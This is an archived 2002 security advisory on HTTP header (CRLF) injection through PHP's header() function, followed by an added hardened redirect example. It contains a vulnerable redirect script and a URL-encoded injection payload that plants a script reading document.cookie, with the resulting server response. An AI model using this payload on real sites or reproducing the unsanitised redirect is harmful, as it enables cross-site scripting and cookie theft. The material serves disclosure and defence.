PHP header() CRLF Injection

From: Matthew Murphy (mattmurphy@kc.rr.com)
Date: 09/08/02


From: "Matthew Murphy" <mattmurphy@kc.rr.com>
To: "VulnDiscuss" <vulndiscuss@vulnwatch.org>, "VulnWatch" <vulnwatch@vulnwatch.org>, "Vuln-Dev" <vuln-dev@securityfocus.com>, "SecurITeam News" <news@securiteam.com>, "BugTraq" <bugtraq@securityfocus.com>
Date: Sat, 7 Sep 2002 17:36:49 -0500

PHP's header() function is used to modify HTTP header information by
specifying a header line, such as this:

<?php header("Location: http://www.yahoo.com/"); ?>

It is commonplace to see things such as this:

--- REDIR.PHP ---
<?php header("Location: " . $_GET['url']); ?>
--- REDIR.PHP ---

http://localhost/redir.php?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%79%61%68%6F
%6F%2E%63%6F%6D%2F%0D%0A%0D%0A%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%
6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E%3C%2
1%2D%2D

Will cause a series of lines to be produced:

HTTP/1.1 302 Found
Server: Xitami
Date: Sat, 07 Sep 2002 21:50:17 GMT
Content-length: 96
Content-type: text/html
X-powered-by: PHP/4.2.3
{Location: http://www.yahoo.com/

<SCRIPT>alert(document.cookie)</SCRIPT><!--} <-- See our code in between the brackets
Content-type: text/html

The HTML produced is "broken" -- that is, it doesn't comply with RFC
standards, because it doesn't have a "-->" tag. I did this to suppress
the stupid "Content-type" header that PHP was dumping in the response.

By using this, attackers can perform cross-site scripting attacks or
initiate downloads, in rare cases (via HTTP headers, such as
Content-Disposition, etc.)

"The reason the mainstream is thought
of as a stream is because it is
so shallow."
                     - Author Unknown
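
A hardened counterpart to the redir.php pattern in the message above, as an added example that is not part of the original post: it rejects control characters (the decoded %0D%0A) before the value reaches header() and redirects only to allowlisted hosts. ALLOWED_HOSTS and redirect_target() are names assumed for illustration.

```php
<?php
// Added example, not from the original advisory.
// ALLOWED_HOSTS and redirect_target() are hypothetical names.

const ALLOWED_HOSTS = ['www.yahoo.com'];    // constructed allowlist

// Return a URL that is safe to place in a Location header, or null.
function redirect_target(string $raw, array $allowedHosts): ?string
{
    // PHP has already percent-decoded $_GET, so %0D%0A arrives here as
    // raw CR LF. Reject every control character, not only CR and LF.
    if ($raw === '' || preg_match('/[\x00-\x1F\x7F]/', $raw)) {
        return null;
    }
    $parts = parse_url($raw);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;                        // relative or malformed URL
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;                        // only web schemes
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null;                        // no credentials in the URL
    }
    if (!in_array(strtolower($parts['host']), $allowedHosts, true)) {
        return null;                        // host not on the allowlist
    }
    return $raw;
}

$raw = $_GET['url'] ?? '';                  // may be an array (url[]=...)
$target = is_string($raw) ? redirect_target($raw, ALLOWED_HOSTS) : null;
if ($target === null) {
    http_response_code(400);
    header('Content-Type: text/plain');
    echo "Invalid redirect target\n";
    exit;
}
header('Location: ' . $target, true, 302);
exit;
```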


